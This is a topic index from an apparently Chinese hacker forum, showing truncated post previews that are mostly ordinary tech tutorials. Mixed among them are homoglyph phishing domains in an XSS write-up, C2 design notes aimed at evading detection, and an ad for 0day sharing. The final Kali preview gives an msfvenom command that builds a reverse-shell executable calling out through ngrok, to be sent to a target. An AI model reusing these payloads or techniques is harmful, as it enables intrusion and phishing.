Communication center
Here you can talk about website construction, servers, accelerators and other topics.
1,234 topics in this forum
-
- 0 replies
- 1.9k views
前几天看到 B 站 up 主公孙田浩投稿的视频「QQ 被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气…… 实际上这就是一个中规中矩的 XSS 漏洞案例,在安全圈子里面应该也算是基本操作,正好博客以前没有记录过类似的文章,那么本文就来还原一下这个攻击过程。 鉴别网站 下面是一个经典的 QQ 空间钓鱼网站: 域名分析 钓鱼网站最直观的就是看域名,可以看到目标网站域名 :qq.xps.com 尽管域名中出现了 qq 字样,但是一级域名却是 xps.com 这一点就直接暴露了钓鱼网站的本性。 早期还有一种利用拉丁字母注册的域名伪造钓鱼网站的案例,这种就比较逼真了,下面国光简单列举一些: OPPO 官网 真假域名 BASH # 真域名 www.oppo.com # 假域名 www.οppο.com Pornhub 官网真假域名 BASH # 真域名 www.pornhub.com # 假域名 www.ρornhub.com 唯品会官网 真假域名 BASH # 真域名 www.vip.com # 假域名 www.νip.com 关于这类域名就不再列举了,早期这种方法成功率是非常的高的,有时候甚至都可以欺骗到我们这种专…
Last reply by 0X01001, -
- 0 replies
- 330 views
研究人员发现,在有超过9万个WordPress网站所使用的两个主题中发现了一个重要的权限升级漏洞,这些漏洞可以让威胁者完全接管这些网站。 WordFence威胁情报团队研究员Ramuel Gall发现了这个漏洞,他在周三发表的一篇博文中透露,这是他在4月初至5月初在Jupiter和JupiterX高级WordPress主题中发现的五个漏洞之一。 其中一个漏洞被追踪为CVE-2022-1654,在CVSS上被评为9.9级,即关键级,该漏洞允许任何经过验证的攻击者,包括任何用户或客户级攻击者,获得管理权限并完全接管任何运行Jupiter主题或JupiterX核心插件的网站,并且该插件是运行JupiterX主题所必需的。 该主题受影响的版本是Jupiter Theme 6.10.1或更早,以及JupiterX Core Plugin 2.0.7或更早。 WordFence于4月5日完成了对大部分漏洞的调查,并在同一天向Jupiter和JupiterX主题开发商ArtBees报告了这些漏洞;5月3日,他们向开发商通报了另外一个Jupiter主题漏洞。到5月10日,开发商发布了Jupiter和JupiterX主题的最新版本,修补了其中所有的漏洞。 严重的漏洞 研究员所发现的关键漏洞存在于一个名为uninstallTemplate的函数中,该函数可以…
Last reply by 0X01001, -
- 1 reply
- 228 views
介绍 我最近通过了 AWS 认证解决方案架构师 - 助理考试。我想分享一下我对我所做的事情的看法,以及我一路上保留的一些笔记。在开始之前,值得考虑一下这次考试的内容。 AWS 认证解决方案架构师 - 助理适用于在 AWS 上设计可用、经济高效、容错且可扩展的分布式系统具有一年或一年以上实践经验的任何人。 AWS 解决方案架构师助理考试是目前最受欢迎的认证考试之一,适用于任何试图进入云工程、架构或 Web 解决方案的人。它涵盖了 AWS 系统的技术部署、AWS 最佳实践以及在 Amazon AWS 生态系统中能力和工作所需的其他技能等方面。 本文概述了我用于准备 AWS SAA-C02 考试的内容和培训材料。 考试先决条件 在参加此考试之前,AWS 建议您具备以下条件: 一年的 AWS 技术实践经验,包括使用计算、联网、存储和数据库 AWS 服务以及 AWS 部署和管理服务 具有在 AWS 上部署、管理和操作工作负载以及实施安全控制和合规性要求的经验 熟悉使用 AWS 管理控制台和 AWS 命令行界面 (CLI) 了解 AWS 架构完善的框架、AWS 联网、安全服务和 AWS 全球基础设施 能够确定哪些 AWS 服务满足给定的技术要求,并为基于 AWS 的应用程序定义技术要求 考试概述 水平:副 时长:130分钟完成考试 费用:150美元 有关其他费用信息,请访问考试定价。 格式:65个问题,选择题或多选题 交货方式:培生VUE和PSI;考试中心或在线监考考试 考试大纲 本考试指南包括…
Last reply by HACK1949, -
- 0 replies
- 203 views
C2是什么我就不赘述了,在设计初期放一些手稿,希望对大家有所帮助。 第一章设计理念 1. 设计模型 C2采用Client-Teamserver-Agent设计,其中Agent由汇编和C实现,而Teamserver和Client由C#实现。 Agent部分以RDI技术为核心进行扩展,采用Fork&Run思想进行设计,即将puppet进程注入RDI反射DLL。这样做的好处是,Agent通过设计避免了这块已用内存的回收问题,提高了RDI模块本身的容错能力。 ,但这种设计也有很多缺陷。从 OPSEC 的角度来看,这种设计并不是特别合适,所以我们也提供了一种比 Fork&Run 更难检测的模式。作者选择了Master-Worker模式,Worker以抢占方式执行Master分配的任务。 TeamServer 和 Client 都是用 C# 编写的。为了用户体验,它被设计为与CS连接(Cobaltstrike下面如果没有指定,将被称为CS),以及使用ASP.NET WEB Api的Client和Teamserver之间的连接。数据交互,使用自建的WEB Server或Raw Socket与Agent进行交互。数据格式参考cobaltstrike,将Channel(通道,即数据的传输方式)和Metadata(元数据,即Agent的操作指令)解耦,即通道与元数据分离,并且在数据传输过程中使用了RSA+AES的强加密(在通道中实现)。 详…
Last reply by 轩辕三官, -
- 1 reply
- 260 views
CHT攻防小组,创始于2016年;是近几年新兴起的黑客攻防团队。2017年创建【CHT】论坛。下面可以了解我们取得的成就,以及团队的介绍。在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。 团队数据库里集中各类大程序、模板、系统0day(用为网络安全研究使用),目前CHT (The Hacker World 黑客世界)已是全球最大的中文黑客论坛,包含板块众多,可以学习网络安全、编程技术、渗透测试、逆向破解等各类黑客攻防教程。 ------------------------------------------------------------------------------------------------------------------- 业务合作我们的联系方式: 渗透测试/逆向破解/APT病毒分析/定制开发等项目。 请使用Telegram(电报 7X24小时在线)关注我们的频道:@hackapt 业务合作直接联系组长或者从上方频道进入:@hackapt 加入Telegram讨论群,交流黑客攻防技术,群内不定期分享工具,1day等: https://t.me/hackapt ------------------------------------------------------------------------------------------------------------------- …
Last reply by CNHAT, -
- 0 replies
- 339 views
CHT攻防小组 1-拥有该消息的论坛成员对论坛中所写的消息负责。我们的论坛不对个人撰写的文章承担任何责任。 2-违反中华人民共和国法律或国际法律、协议和法规的消息不能发送到论坛。 3-不允许写关于社区的挑衅和侮辱性文章。(例如:移民、对友国不好的言论等) 4-发送威胁、辱骂、违反习俗、仇恨或大量不请自来的信息;发送有关宗教、语言和种族的信息和使用材料;禁止贬低论坛管理员和用户。 5-严格禁止所有纯粹出于政治和宣传目的而没有评论目的的消息。 6-禁止任何骚扰性的写作。 7-论坛内禁止发布任何政治问题。 8-禁止在论坛中发布包含各种广告活动的主题消息。 9-禁止在主题和消息中使用图像,以免破坏页面结构并减慢页面打开速度。同样的禁令也适用于视频共享。 10-论坛管理员和管理员有权删除和更改不符合规则的主题和消息。 11-违反论坛规则或 CHINA HACKER TEAM 任务的成员可能会被暂时或永久禁止进入论坛。 12-一些特殊的分类规则,这里没有包含,可以由管理员在相关分类中单独指定。 13-由于法律原因,论坛中的任何会员都不能完全删除,可以根据需要在不激活的情况下成为会员。 14-禁止分享受版权保护的 mp3、电影、程序、游戏。 15-禁止发送非法观看Digiturk、lig tv/beinsports、tivibu、dsmart等国内平台比赛影片转播的信息和链接等活动。 16-禁止信用卡盗窃、购买信用卡信息、用被盗卡购物、贝宝欺诈、银行账户接管等活动。禁止伪造身份、金钱、文件等问题。 17-禁止侮辱中国所有领导人和政治家。 1…
Last reply by HACK1949, -
- 0 replies
- 143 views
题目: Given a binary tree struct Node { int val; Node *left; Node *right; Node *next; } Populate each next pointer to point to its next right node. If there is no next right node, the next pointer should be set to NULL. Initially, all next pointers are set to NULL. Follow up: You may only use constant extra space. Recursive approach is fine, you may assume implicit stack space does not count as extra space for this problem. Input: root = [1,2,3,4,5,null,7] Output: [1,#,2,3,#,4,5,7,#] Explanation: Given the above binary tree (Figure A), your function should populate each next pointer to point to its next right node, just like in Figure B. The serialized output i…
Last reply by HACK1949, -
- 0 replies
- 139 views
随着云采用的扩大,订阅和配置资源与日俱增。企业有多种策略来实施其云部署:单云、私有云、多云或混合云。有必要定期分析和评估,以密切关注使用情况,以确保云资源的支出有效且没有浪费。 有各种可能性,但需要一定程度的技术能力和定期维护: 使用 Azure 门户功能配置资产管理和监视 使用 Microsoft Azure 支持公开的 API 构建自定义工具 使用第三方工具和服务 并非所有利益相关者都可以访问并有必要检查这些工具,但决策者很容易调查报告、摘要、比较评估和有用的图表或图表表示。这将帮助他们简要评估使用情况并做出战略决策。 精心设计和阐明的Microsoft Azure环境文档可以帮助轻松理解用法,而无需访问太多工具和配置。 Serverless360 中的 Azure 文档生成器可帮助您记录 Microsoft Azure 订阅。它能够在单个报表中聚合来自Microsoft Azure中不同资源提供程序的数据。 这允许跨资源创建全面的技术文档,从而提供更丰富的见解,否则是不可能的。将 Microsoft Azure 订阅的成本和资源信息解释为清晰的文档是 Azure Documenter 的用途。 Microsoft Azure 的使用在不断发展 与任何其他云服务提供商一样,Microsoft Azure 可以轻松地在订阅的基础上轻松实例化和部署资源。尽管可以设置使用限制和受限用户权限,但由于各种目的的业务需求的性质,资源部署和使用量与日俱增。 资源可以手动部署,也可以通过自动化流程部署 跨地理位置部署资源 资…
Last reply by HACK1949, -
- 0 replies
- 154 views
我的金融科技概论 一年前,我对金融科技一无所知。在进入职场之前,我无法告诉你金融科技是什么,或者它意味着什么。但是,在金融科技行业担任了六个月的技术作家之后,我对这意味着什么有了更好的了解。我很自豪能在金融科技界工作。 金融科技代表“金融技术”。该行业专注于技术知情的解决方案,用于使人们能够尽快将资金转移到不同的地方。作为一名技术作家,我编写用户文档,告知普通用户如何浏览 Rapyd 的 API。API是转移资金的技术解决方案:将企业和机构连接到全球金融网络中的软件。 如果开发人员是金融科技世界的明星,那么技术作家就是后台的工作人员,对齐灯光,拉窗帘,协调其他人可以使用的信息。技术作家是专家和用户群之间的桥梁。 Rapyd 将开发人员视为他们的核心受众,即使用 Rapyd API 使用和实施解决方案的人。Rapyd员工与开发人员互动的一个地方是通过Rapyd社区,这是一个在线论坛,开发人员可以在其中提出问题并与他人联系。作为这个社区的版主,我参与开发人员的讨论并回答发布到社区的问题。 在Rapyd工作,我能够看到开发人员和技术作家如何协同工作,形成一种信息生态系统,用于创建问题的解决方案。企业希望获得报酬的过程更快、更容易,他们使用开发人员为其业务实施这些解决方案。Rapyd 通过提供一个每个人都可以使用的平台,是这个过程不可或缺的一部分。 金融科技即服务 (FaaS) “金融科技即服务”是金融科技行业的一个关键概念。您可以将SaaS或“软件即服务”视为此概念的前身,其中公司创建的软件被用作连续服务来解决各种问题。 以前,软件…
Last reply by HACK1949, -
- 0 replies
- 145 views
前言 存储适配系列文章: 在持久化数据的时候,一般都是选择存入到文件里,本篇将着重分析Android 存储相关的知识,也是为Android 10.0 11存储适配打基础。 通过本篇文章,你将了解到: 1、存储划分 2、内部存储 3、外部存储 4、易混淆点说明 1、存储划分 Android 4.4 之前 在Android 4.4 之前,由于硬件发展受限,手机自身的存储空间有限,需要通过外置SD卡来扩展存储空间。 如上图,手机自身的存储空间,称之为机身存储,在Android 4.4 之前作为内部存储使用。当然内部存储空间一般是不够用的,所以需要通过插入外置SD卡来扩充存储空间,这当做外部存储。 Android 4.4之后 在Android 4.4 之后(含),手机机身存储扩大了: 如上图,机身存储划分为两部分: 1、内部存储 2、外部存储 当然,依然可以插入SD卡来扩充存储空间,这部分的存储空间称为扩展的外部存储空间。只是现在机身存储都比较大,很少插入SD卡了。 接下来将以Android 4.4 之后的存储划分来分析具体的存储方案。 2、内部存储 存放位置 回想一下平时使用的持久化方案: 1、SharedPreferences---->适用于存储小文件 2、数据库---->存储结构比较复杂的大文件 以上这些文件都是默认放在内部存储里。 “/” 表示根目录,内部存储里给每个应用按照其包名各自划分了目录,假设App的包名为:com.fish.myapplication 那么该文件在内部存储里的目录为: /data/us…
Last reply by HACK1949, -
- 0 replies
- 124 views
Facebook等网站在有未保存的数据时实现离开当前页面的确认。这并不难做到,但我确实需要一些实验来找出有效的方法。我在这篇文章中讨论我的发现。 我正在使用Jinja 模板引擎来生成 HTML 页面。对于客户端,我正在使用JQuery。我提到使用Jinja 模板引擎是为了动摇完整性,无论用于生成动态 HTML 的方法是什么都无关紧要,因为我们正在讨论的纯粹是客户端的。 要实现此离开页面确认,我们需要处理Window: beforeunload 事件。我想为整个网站的所有页面执行此操作,因此我在基本模板中实现它: File base_template.html <!doctype html> <html lang="en" class="h-100"> <head> ... <script src="http://localhost/work/jquery/js/jquery-3.6.0.min.js"></script> ... <script> // Individual pages must set and reset this during their operations. let dataChanged = false; const setDataChanged = () => dataChanged = true; const re…
Last reply by HACK1949, -
- 0 replies
- 109 views
先决条件 爪哇> 11 格拉德尔 > 5 在 Gradle 中设置增强型客户端 要在 Gradle 中设置增强型客户端,需要添加以下依赖项 implementation 'com.amazonaws:aws-java-sdk-dynamodb:1.11.434' implementation 'software.amazon.awssdk:dynamodb:2.17.28' implementation 'software.amazon.awssdk:dynamodb-enhanced:2.17.28' 设置DynamoDb Local AWS 文档提供了设置 maven build 的步骤,但 AWS 不提供 Gradle 设置,并且此库不可用中央 maven 存储库,因此用户需要设置 AWSmaven存储库以设置 DynamoDb Local repositories { maven { name url "https://s3-us-west-2.amazonaws.com/dynamodb-local/release" } } 以下依赖项会将 DynamoDbLocal 添加到 gradle 项目中 testImplementation group: 'com.amazonaws', name: 'DynamoDBLocal', version: '1.11.119' 您可以在https://github.com/reds…
Last reply by HACK1949, -
- 0 replies
- 126 views
但是Java中有一个功能使它与C++等功能区分开来。你问那是什么?这是因为Java本质上是独立于平台的。为什么 Java 平台是独立的? 我们将在本文中回答您的所有whatsapp,方法和原因,因此请阅读到最后以清除这些疑虑的阴霾。让我们开始吧! 什么是平台? 现在,您可能遇到的第一个问题是,平台到底是什么?用最简单的话来说,平台是程序运行的环境。此环境由软件、硬件和操作系统组成。 运行程序的软件、硬件和操作系统的组合环境称为平台。 什么是平台独立? 不同的计算机程序在不同的环境中运行不同。例如,Windows 应用程序或软件无法在 Mac 操作系统上运行。 尽管有些应用程序可以在多个操作系统(如MS PowerPoint)上运行,但它们需要适合每个系统的不同编程。 但是由于Java是独立于平台的,这个问题就解决了。独立于平台意味着软件可以在具有相同编程的各种计算机环境中运行。 因此,您必须为每个平台更改代码。此功能有可能使编码人员的劳动减半。 为什么 Java 平台是独立的? Java平台之所以独立,是因为用Java编写的程序可以在各种平台上运行,而无需为每个平台重新编写它们。Java的这个特性基于口号Write Once, Run Anywhere [WORA]。以下是使 Java 平台独立的整个过程的细分。 Java 平台如何独立? 在这里,我们将讨论使Java平台独立的过程。要理解这一点,我们需要首先了解依赖于平台和独立于平台的编程软件的编译过程。 每当我们编写程序时,它都会包含计算机无法理解的单词,短语,名称…
Last reply by HACK1949, -
- 0 replies
- 143 views
读/写分离是一种将读写路由到多个数据库服务器的技术,允许您执行基于查询的负载均衡。在应用程序级别实现这一点很困难,因为它将代码或配置参数耦合到基础数据库拓扑。例如,您可能必须为数据库集群中的每个服务器定义不同的连接池。 MariaDB MaxScale 是一个高级数据库代理,可用作读/写拆分器,将语句路由到副本节点和//语句路由到主节点。此操作会自动发生,而无需更改应用程序代码甚至配置 — 使用 MaxScale,数据库对您的应用程序来说就像一个单节点数据库。SELECTINSERTUPDATEDELETE 在本实践教程中,您将学习如何使用一个主节点和两个副本节点配置 MariaDB 数据库复制,以及如何设置 MaxScale 以隐藏底层拓扑的复杂性。最好的部分:您无需离开网络浏览器即可学习所有这些! 玩与码头工人网站 Play With Docker(PWD) 是一个网站,允许您创建预装Docker的虚拟机,并直接在浏览器中与它们进行交互。登录并启动新会话。 Play with Docker 网站 您将总共使用 5 个节点: 节点 1:主服务器 节点 2:副本服务器 A 节点 3:副本服务器 B 节点 4:最大规模数据库代理 node5:测试计算机(例如,相当于 Web 服务器) 注意:尽管Docker 容器上的数据库非常适合最简单的场景和开发环境,但它可能不是生产环境的最佳选择。MariaDB 公司目前不支持生产环境中的 Docker 部署。对于生产环境,建议使用 MariaDB E…
Last reply by HACK1949, -
- 0 replies
- 125 views
前言 在本篇文章当中讲主要给大家介绍 pthread 并发编程当中关于线程的基础概念,并且深入剖析进程的相关属性和设置,以及线程在内存当中的布局形式,帮助大家深刻理解线程。 深入理解 pthread_create 基础例子介绍 在深入解析 pthread_create 之前,我们先用一个简单的例子简单的认识一下 pthread,我们使用 pthread 创建一个线程并且打印 Hello world 字符串。 #include <stdio.h> #include <pthread.h> void* func(void* arg) { printf("Hello World from tid = %ld\n", pthread_self()); // pthread_self 返回当前调用这个函数的线程的线程 id return NULL; } int main() { pthread_t t; // 定义一个线程 pthread_create(&t, NULL, func, NULL); // 创建线程并且执行函数 func // wait unit thread t finished pthread_join(t, NULL); // 主线程等待线程 t …
Last reply by HACK1949, -
- 0 replies
- 133 views
技术方案 为了解决异构数据的权属和信任问题,本方案提出了一种通过AIOT和区块链技术来对用户的人车房等隐私数据进行确权并使数据可信的方法。 需要确权的隐私数据有:人员通行记录、人员识别记录、车辆通行记录、人员信息、车辆信息、房产信息 该发明由用户服务、区块链网络、AIOT引擎组成,如图1所示 用户服务用于用户注册认证,用户将身份证和人脸发送至可信机构(公安部门)进行人证合一核验,核验不通过,直接拒绝注册,核验通过后在用户服务生成账户,并请求区块链引擎生成数字证书;用户车辆信息通过用户提交的机动车登记证书发送至可信机构(车辆管理所)进行认证,认证通过关联用户账户;房产信息通过用户提交的房产证发送至可信机构(房屋管理局)进行认证,认证通过关联用户账户。 AIOT引擎用于对接硬件设备,在设备捕获用户行为产生数据后通过一定算法确定数据归属用户。人员通信记录通过分析门禁卡、人脸识别确定归属用户;人员识别记录通过人脸识别确定归属用户;车辆通信记录通过车牌识别确定归属用户;并将这些数据发送到区块链引擎,由可信节点进行背书,最终生成可信数据。 区块链网络具有若干个节点,节点数可以示具体情况而定,但至少一个CA机构用于颁发可信数字证书。 人员核验 人员信息核验流程如图2所示,在用户服务中处理,该步骤可以在用户注册的时候,也可以在后期资料补充的时候进行。 S1:用户通过客户端录入人脸,首先进行人脸活体检测,活体检测通过后,进入下一步 S2:检测通过后用户提交真实姓名、身份证号,首先验证身份号格式是否正确,姓名与身份证是否一致,验证通过,发送到后端服…
Last reply by HACK1949, -
- 0 replies
- 125 views
为什么是另一个JS捆绑器 技术进步非常快。每天,您都会看到新的框架、构建工具和库来加速和改进您的软件应用程序。ESBuideal是不断创新和改进的另一个例子。它是一个开源的下一代JavaScript捆绑器,比业内其他捆绑器非常快速,更高效。它是用 Go 语言编写的,考虑到速度;它由并行解析、打印和源映射生成提供支持。它打包并捆绑JS代码以在Web上分发。它的一些功能包括: 它非常快,即使没有任何缓存。它比其他捆绑器快得多。 适用于 JavaScript 和 Go 的强大 API ES6 和常用 JS 模块 支持 TypeScript 和 JSX 语法 源映射 缩小 esbuild的特点 让我们详细介绍一下它的一些功能。 捆绑和支持的内容类型 esbuild支持捆绑和代码拆分。捆绑是指要部署单个目标。代码拆分是指您想要拆分为许多目标,例如等。esbuild使用其称为“加载器”的组件对各种内容类型的内置支持。加载程序告诉 esbuild 如何解析特定的内容类型。默认情况下启用的三个常见加载程序是:app.jsapp.jsheader.jssidebar.js 打字稿加载器 JavaScript loader CSS 加载器 如果我们看一下esbuild支持的内容类型,那么这些内容类型如下: JavaScript Loader:如上所述,JavaScript 加载器默认处于启用状态,它支持 andfiles。.js.cjs.mjs 打字稿加载器:默认启用..和文件。但是,它不支持类型检查。.ts.tsxmts.cts …
Last reply by HACK1949, -
- 0 replies
- 131 views
面向对象 一、三大特征之继承 python三大特征: 封装、继承、多态 三者中继承最为核心,实际应用多,感受较为直观 封装和多态略微抽象 1、继承的概念 继承的含义: 在现实生活中,继承表示人与人之间资源的从属关系 例如:儿子继承父亲 在编程的世界中,继承表示类与类之间的资源从属关系 例如:类a继承类b 继承的目的: 在现实生活中,儿子继承了附件就拥有了父亲所有资源的支配权限 在编程世界中,类A继承了类B就拥有了类B中所有的数据和方法使用权限 2、继承的本质 继承本质应该分为两部分: 当多个类中含有相同部分时,我们就把相同的部分抽离出去,将相同的部分新成一个新的类,在用刚才被抽离出去相同部分的类,去继承新的那部分,这样的好处就是,当多个类需要一个相同用的功能时,可以节省代码,不用反复编写 抽象:将多个类相同的东西抽出去,形成一个新的类 继承:将多个类继承刚刚抽取出来的新的类 对象>>>:数据与功能的结合体 类(子类)>>>:多个对象相同功能和数据的结合体 父类>>>:多个子类相同功能和数据的结合体 本质:类、父类的本质都是为了节省代码,减少重复编写相同代码的时间,使用时更为方便 3、继承的实操 在定义类的时候,类名后方可加括号,早括号内填入其他它类的名字,就意味着继承了其它类 python支持多类继承,括号内可填写多个类名,只需用逗号隔开即可 # 1、定义两个类,其中一个假设为父类,另一个…
Last reply by HACK1949, -
- 0 replies
- 143 views
Python及其在数据科学中的应用 Python很容易学习,它的语法也相对简单。它是数据科学的流行语言,因为它功能强大且易于使用。Python 是一种出色的数据分析语言,因为它包含各种数据结构、模块和工具。 你应该将Python用于数据科学的原因有很多: Python是一种非常通用的语言。它可用于各种数据科学任务,从数据预处理到机器学习和数据可视化。 Python非常容易学习。您无需成为计算机科学专家即可开始使用Python进行数据科学。事实上,大多数数据科学任务都可以通过几个简单的Python命令来完成。 Python 由广泛的库和工具支持。这意味着您可以轻松找到执行数据科学任务所需的工具和库。 Python 中的一些关键数据科学库 有一些具有数据科学功能的python 库值得一提。 NumPy是一个流行的数据分析和科学计算库。它具有广泛的数据结构,包括数组、列表、元组和矩阵。 IPython是Python的交互式shell,可以轻松探索数据,运行代码以及与其他用户共享结果。它为数据分析提供了一组丰富的功能,包括内联绘图和代码执行。 SciPy是用于数据分析、建模和科学计算的数学库的集合。它包括用于数据处理、线性代数、成像、概率等的工具。 Pandas是一个强大的数据分析和数据可视化库。它具有一些独特的功能,包括数据框,类似于Excel工作表,但可以容纳更多数据,以及强大的数据分析操作,例如排序和分组。 使用 Python 改进数据科学工作 有很多方法可以使用Python改进数据科学工作。以下是一些提示: 使用数据科…
Last reply by HACK1949, -
- 0 replies
- 168 views
简介: Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 Kali常用配置和基本使用: Kali工具集介绍 修改Kali源和更新软件 Kali伪装成win10 Kali启动root用户 1.外网步骤思想图 Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成Shell.exe ----->监听当前Ip是否点击---->目标电脑发送exe---->点击shell.exe 1、进入Ngrok网站注册一个用户() 2.下载Kali LInux版本 1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 2. 拖入虚拟器托不进去看上一个教程 解压zip 3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用 ./sunny clientid id =>隧道id 启动了当前窗口不要关闭 3、MSF生成外网MM 不加Tcp不然报错 msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com:10161 lport=10306 -f exe -o /home/shell.exe 4、打开msf设置payload,加载攻击模块设置本地IP和监听端口 msfconsole 开启 5.绑定当前端口Ip use exp…
Last reply by HACK1949,